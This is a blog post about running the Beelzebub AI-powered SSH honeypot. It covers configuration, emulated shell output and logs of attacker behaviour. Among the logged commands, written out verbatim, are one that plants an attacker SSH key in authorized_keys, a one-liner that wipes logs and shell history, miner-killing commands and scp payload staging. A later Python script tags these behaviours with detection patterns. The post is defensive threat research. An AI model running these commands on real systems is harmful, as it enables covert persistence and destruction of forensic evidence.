[EN] A Honeypot Story
Hi everyone. In this article, I'll walk you through my research on an AI-powered honeypot project that I deployed in the cloud to observe attacker tactics and techniques.
I built the honeypot in a cloud environment using Beelzebub, an AI-supported honeypot, to evaluate how effective it is, and it performed very well.
Before AI honeypots, you typically had two choices: convert a real machine into a honeypot (very effective but risky), or deploy traditional honeypots (safer but easier for attackers to detect). The core idea of a honeypot is to imitate a real system inside or outside your network so you can observe malicious behavior and act before a real breach occurs. However, depending on your network configuration, attackers may still identify the deception. If you allow outbound internet access, an attacker might leverage it for malicious activity that could harm your organization’s reputation. If you don’t allow outbound access, you either need to simulate realistic responses or accept that the system may be exposed as a honeypot.
This is where AI honeypots step in and say, “Stand up—your father is here!”
LLM-generated responses change this trade-off: the honeypot can answer convincingly without handing the attacker a real shell or real outbound access. Beelzebub supports various protocols including SSH, HTTP, MCP, and MySQL. Here is an example AI-supported SSH config file:
apiVersion: "v1"
protocol: "ssh"
address: ":2222"
description: "SSH interactive ChatGPT"
commands:
  - regex: "^(.+)$"
    plugin: "LLMHoneypot"
serverVersion: "OpenSSH"
serverName: "root"
passwordRegex: "^(admin123|root123|jenkins123|Admin123|root|admin|test)$"
deadlineTimeoutSeconds: 6000
plugin:
  llmProvider: "openai"
  llmModel: "gpt-4o-mini"
  openAISecretKey: "sk-proj-"
Beelzebub allows you to provide a custom prompt, as shown below.
apiVersion: "v1"
protocol: "ssh"
address: ":2222"
description: "SSH interactive OpenAI GPT-4"
commands:
  - regex: "^(.+)$"
    plugin: "LLMHoneypot"
serverVersion: "OpenSSH"
serverName: "ubuntu"
passwordRegex: "^(root|qwerty|Smoker666|123456|jenkins|minecraft|sinus|alex|postgres|Ly123456)$"
deadlineTimeoutSeconds: 60
plugin:
  llmProvider: "openai"
  llmModel: "gpt-4o"
  openAISecretKey: "sk-proj-123456"
  prompt: "You will act as an Ubuntu Linux terminal. The user will type commands, and you are to reply with what the terminal should show. Your responses must be contained within a single code block."
I tested both approaches, but I prefer the configuration without a prompt unless you have a well-crafted prompt and a suitable LLM model.
Here are some sample commands and the honeypot's responses.
ubuntu@root:~$ ls
Documents
Downloads
Music
Pictures
Videos

ubuntu@root:~$ whoami
user

ubuntu@root:~$ w
 10:01:20 up 1:01,  1 user,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
user     pts/0    192.168.1.2      10:00    1.00s  0.01s  0.00s w

ubuntu@root:~$ echo "1" >> test.txt

ubuntu@root:~$ ls
Documents
Downloads
Music
Pictures
test.txt
Videos

ubuntu@root:~$ cat test.txt
1

ubuntu@root:~$ ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=117 time=14.0 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=117 time=13.8 ms
64 bytes from 8.8.8.8: icmp_seq=3 ttl=117 time=14.2 ms
64 bytes from 8.8.8.8: icmp_seq=4 ttl=117 time=14.1 ms

--- 8.8.8.8 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 13.8/14.0/14.2/0.2 ms
As you can see, it convincingly emulates a real system.
Here’s a short video demonstrating its capabilities:
Throughout this project, I collected many username–password combinations, scripts, commands, and artifacts from different sources. Below are some of the usernames, passwords, and unique IPs observed.
Unique IPs
webserver1@webserver1:~/beelzebub/logs$ grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' beelzebub.log | sort -u | wc -l
159
webserver1@webserver1:~/beelzebub/logs$ grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' beelzebub.log | sort -u
101.126.149.60
101.36.98.91
102.88.137.213
103.107.183.97
103.148.195.161
103.171.85.146
103.172.205.208
103.173.229.117
103.174.114.50
103.213.238.91
103.241.43.23
103.243.26.174
103.26.136.173
103.31.38.141
103.45.234.227
103.48.84.29
103.56.115.6
103.90.225.35
104.215.255.146
106.12.29.184
108.65.131.227
109.230.200.203
112.118.173.168
113.7.221.72
115.190.10.158
115.190.44.104
116.193.190.134
117.216.211.19
118.163.132.211
118.195.235.226
119.36.31.170
121.165.204.105
121.37.9.228
123.139.218.0
123.240.255.61
123.253.22.49
1.238.106.229
124.221.16.51
125.20.16.22
125.25.172.245
125.39.179.192
125.86.2.69
125.94.106.195
128.1.131.163
132.145.213.106
134.209.206.143
139.59.46.176
140.249.181.31
14.103.127.58
14.103.145.231
14.103.54.150
142.250.190.14
144.24.195.5
146.190.19.87
151.19.94.164
151.35.124.229
151.43.121.249
151.44.141.61
151.57.113.223
15.206.55.26
154.16.10.170
156.54.108.185
157.230.211.219
159.223.146.141
159.223.238.134
159.65.196.99
160.20.186.237
161.35.25.59
162.240.54.168
163.44.173.168
165.154.201.122
167.99.41.9
169.254.169.254
172.16.2.10
172.190.89.127
172.217.16.46
175.107.193.10
175.12.108.55
176.213.141.182
176.65.151.22
176.95.247.26
179.33.210.213
180.106.83.59
180.76.53.187
181.49.50.6
182.43.76.19
182.57.16.58
183.234.64.3
183.56.205.82
183.66.149.42
185.156.73.233
185.225.22.80
185.65.202.184
186.10.86.130
189.146.171.237
192.146.138.58
192.227.128.4
192.81.208.35
194.0.234.21
195.177.94.29
195.178.110.30
196.251.114.14
197.5.145.150
201.76.120.30
203.6.235.111
206.189.103.33
206.189.202.201
210.79.142.221
211.72.129.211
211.72.129.212
218.92.247.138
221.159.150.85
2.57.122.177
27.111.32.174
27.79.0.78
34.57.181.41
38.85.247.104
40.83.182.122
41.59.229.33
42.117.155.28
43.135.172.68
43.138.184.249
43.157.169.99
45.11.152.12
45.120.216.232
45.130.148.125
45.164.39.253
45.182.207.45
45.186.228.252
45.9.116.195
46.191.141.152
47.236.76.100
47.237.30.186
49.254.74.18
51.195.46.102
51.68.199.166
51.79.86.83
52.187.9.8
57.129.74.123
57.132.175.132
59.126.195.45
64.226.124.227
71.70.164.48
77.222.100.142
78.109.200.135
78.128.112.74
80.136.13.254
80.190.82.51
80.253.251.63
80.94.95.116
80.94.95.118
81.68.91.167
85.215.195.9
89.126.208.241
89.144.35.100
89.97.218.142
9.223.176.221
94.42.110.21
95.214.232.18
Most attempted usernames
webserver1@webserver1:~/beelzebub/logs$ jq -r '.event.User | select(. != null and . != "")' beelzebub.log | sort | uniq -c | sort -rn | head -30
   2661 root
    314 ubuntu
    284 admin
    237 user
    184 test
    149 oracle
    136 debian
    128 postgres
     88 mysql
     71 pi
     56 guest
     54 administrator
     52 newuser
     46 adminuser
     45 12345
     44 docker
     41 1234
     40 webadmin
     39 jenkins
     37 password
     35 alex
     33 Welcome123
     33 user123
     33 Password
     33 Jenkins123
     33 ftpuser
     33 1234567
     32 ubuntu123
     32 Smoker666
     32 P@ssw0rd
Most attempted passwords
webserver1@webserver1:~/beelzebub/logs$ jq -r '.event.Password | select(. != null and . != "")' beelzebub.log | sort | uniq -c | sort -rn | head -30
   1023 123456
    895 password
    889 12345
    867 123456789
    767 iloveyou
    764 princess
    215 1234
    137 123
    111 root
    105 alex
    103 postgres
     99 sinus
     99 minecraft
     99 Ly123456
     94 qwerty
     92 admin
     70 1q2w3e4r
     67 jenkins
     65 password1
     59 admin123
     55 12345678
     48 1234567890
     45 Admin123
     45 123abc
     43 qwerty123
     43 654321
     40 test
     40 pass123
     40 123123
     37 1234567
Most executed commands
webserver1@webserver1:~/beelzebub/logs$ jq -r '.event.Command | select(. != null and . != "")' beelzebub.log | sort | uniq -c | sort -rn | head -50
     41 ls
     11 uname -a
     10 whoami
      9 pwd
      8 w
      8 uname -m
      6 cd ~; chattr -ia .ssh; lockr -ia .ssh
      5 uname
      5 top
      5 ls -lh $(which ls)
      5 lscpu | grep Model
      5 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
      5 df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
      5 crontab -l
      5 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
      5 cat /proc/cpuinfo | grep processor | wc -l
      5 cat /proc/cpuinfo | grep name | wc -l
      5 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
      5 cat /proc/cpuinfo | grep model | grep name | wc -l
      4 rm -rf .bash_history;rm -rf /var/run/utmp;rm -rf /var/run/wtmp -;rm -rf /var/log/lastlog;rm -rf /usr/adm/lastlog;rm -rf .bash_history;cd /home;rm -rf yum.log;cd /var/log/;rm -rf wtmp;rm -rf secure;rm -rf lastlog;rm -rf messages;touch messagess;touch wtmp;touch secure;touch lastlog;cd /root;rm -rf .bash_history;touch .bash_history;unset HISTFILE;unset HISTSAVE;history -n;unset WATCH;cd;HISTFILE=/dev/null;history -c && rm -f ~/.bash_history;cd ..
      4 ping 8.8.8.8
      4 passwd
      4 cat /etc/passwd
      3 ll
      3 cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > netai
      2 uname -s -v -n -r -m
      2 uname -r | awk '{printf $1}'
      2 uname -n | awk '{printf $1}'
      2 uname -m | awk '{printf $1}'
      2 nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1
      2 nvidia-smi -q | grep "Product Name"
      2 nproc
      2 lspci | egrep VGA && lspci | grep 3D
      2 kill -9 $(ps aux | grep xrx |grep -v grep | awk '{print $2}');kill -9 $(ps aux | grep biden1 |grep -v grep | awk '{print $2}');kill -9 $(ps aux | grep zzh |grep -v grep | awk '{print $2}');kill -9 $(ps aux | grep arx645 |grep -v grep | awk '{print $2}');kill -9 $(ps aux | grep kthreaddk |grep -v grep | awk '{print $2}');kill -9 $(ps aux | grep ab |grep -v grep | awk '{print $2}');kill -9 $(ps aux | grep kdevtmpfsi |grep -v grep | awk '{print $2}')
      2 cd
      1 uname -s -m
      1 uname -s
      1 /tmp/kal64
      1 /tmp/amd64
      1 sudo su
      1 sudo -l
      1 sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
      1 sdv
      1 scp -t /var/tmp/8ixni5b4yfecmq07ecilanp4ug
      1 scp -t /usr/local/bin/8ixni5b4yfecmq07ecilanp4ug
      1 scp -t /usr/bin/8ixni5b4yfecmq07ecilanp4ug
As shown above, attackers commonly attempted to fingerprint the system (CPU, memory, GPU, and kernel details, often to assess its cryptojacking potential), add their own SSH key to authorized_keys for persistence, stage binaries via scp into /tmp or /var/tmp, kill competing miner processes, and wipe shell history and login records to cover their tracks.
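To turn the jq one-liners and the command list above into something repeatable, here is an added example of my own (not code from the post or from the Beelzebub project). It parses a few constructed Beelzebub-style JSON log lines, reproduces the per-field counts the jq pipelines produce, takes source addresses from a log field instead of grepping every dotted quad in the file (the grep pipeline above also picks up addresses that appear inside attacker commands, such as the target of a ping), and tags each command with the behaviour it reflects (fingerprinting, SSH-key persistence, staging, killing competing miners, anti-forensics). The `.event.User`, `.event.Password` and `.event.Command` fields are the ones the post's jq filters use; the `SourceIp` field name is an assumption and should be matched to whatever your Beelzebub build emits.

```python
"""Added example: summarise Beelzebub-style JSON logs and tag attacker commands.
Not part of the original post or the Beelzebub project; the SourceIp field
name is assumed."""
import ipaddress
import json
import re
from collections import Counter

# Constructed sample log lines (documentation-range addresses, placeholder key).
SAMPLE_LOG = r'''
{"event":{"SourceIp":"203.0.113.7","User":"root","Password":"123456","Command":""}}
{"event":{"SourceIp":"203.0.113.7","User":"root","Password":"123456","Command":"uname -a"}}
{"event":{"SourceIp":"203.0.113.7","User":"root","Password":"123456","Command":"whoami"}}
{"event":{"SourceIp":"203.0.113.7","User":"root","Password":"123456","Command":"cd ~; chattr -ia .ssh; lockr -ia .ssh"}}
{"event":{"SourceIp":"198.51.100.9","User":"ubuntu","Password":"password","Command":""}}
{"event":{"SourceIp":"198.51.100.9","User":"ubuntu","Password":"password","Command":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAA...placeholder\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"}}
{"event":{"SourceIp":"198.51.100.9","User":"ubuntu","Password":"password","Command":"rm -rf .bash_history;unset HISTFILE;history -c"}}
{"event":{"SourceIp":"192.0.2.33","User":"admin","Password":"123456","Command":"scp -t /var/tmp/payload"}}
{"event":{"SourceIp":"192.0.2.33","User":"admin","Password":"123456","Command":"ping 8.8.8.8"}}
'''

# Behaviours seen in the command list; searched in this order so tag order is stable.
TTP_PATTERNS = [
    ("fingerprint", re.compile(r"\b(uname|lscpu|nproc|nvidia-smi|whoami|w|top|free -m|df -h)\b|/proc/cpuinfo")),
    ("persistence", re.compile(r"authorized_keys|chattr -ia \.ssh")),
    ("anti_forensics", re.compile(r"\.bash_history|HISTFILE|history -c|/var/log/|wtmp|lastlog")),
    ("staging", re.compile(r"\bscp -t\b|cd /dev/shm|cd /tmp|^/tmp/")),
    ("kill_competitors", re.compile(r"kill -9 .*grep")),
    ("connectivity", re.compile(r"\bping\b")),
]

# The same pattern the grep -oE pipeline above uses.
IP_RE = re.compile(r"\b([0-9]{1,3}\.){3}[0-9]{1,3}\b")


def parse_events(text):
    """Return the .event object of every non-empty JSON line."""
    return [json.loads(line)["event"] for line in text.splitlines() if line.strip()]


def top_values(events, field, n=10):
    """jq -r '.event.<field> | select(. != null and . != "")' | sort | uniq -c | sort -rn | head -n."""
    counts = Counter(e.get(field) for e in events if e.get(field))
    return counts.most_common(n)


def source_ips(events):
    """Distinct attacker addresses from the dedicated field, sorted as addresses
    (sort -u on raw text orders the strings, not the numeric octets)."""
    return sorted({e["SourceIp"] for e in events if e.get("SourceIp")}, key=ipaddress.ip_address)


def grep_ips(text):
    """What the grep pipeline sees: every dotted quad in the file, including
    addresses inside attacker commands, so it overcounts sources."""
    return {m.group(0) for m in IP_RE.finditer(text)}


def classify(command):
    """Tags for one command in TTP_PATTERNS order; an empty list is plain noise."""
    return [tag for tag, rx in TTP_PATTERNS if rx.search(command)]


def summarize(text):
    events = parse_events(text)
    ttps = Counter(tag for e in events for tag in classify(e.get("Command") or ""))
    return {
        "users": top_values(events, "User"),
        "passwords": top_values(events, "Password"),
        "commands": top_values(events, "Command"),
        "source_ips": source_ips(events),
        "grep_ips": sorted(grep_ips(text), key=ipaddress.ip_address),
        "ttps": ttps,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On the sample data the field-based list yields three sources while the grep-based set also contains 8.8.8.8 from the ping command; on a real log the same effect explains entries like 169.254.169.254 or private addresses showing up in a "unique IPs" list. The tag patterns are deliberately narrow (an `authorized_keys` write or `chattr -ia .ssh`, history and `wtmp`/`lastlog` removal, `scp -t`, `kill -9 ... grep`) so they can be lifted into a SIEM rule without flagging ordinary administration.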
I will write detailed posts about specific attacks to show what happens behind the scenes.
Thank you for taking the time to read this article—I hope you find it useful.
Keep up the good work.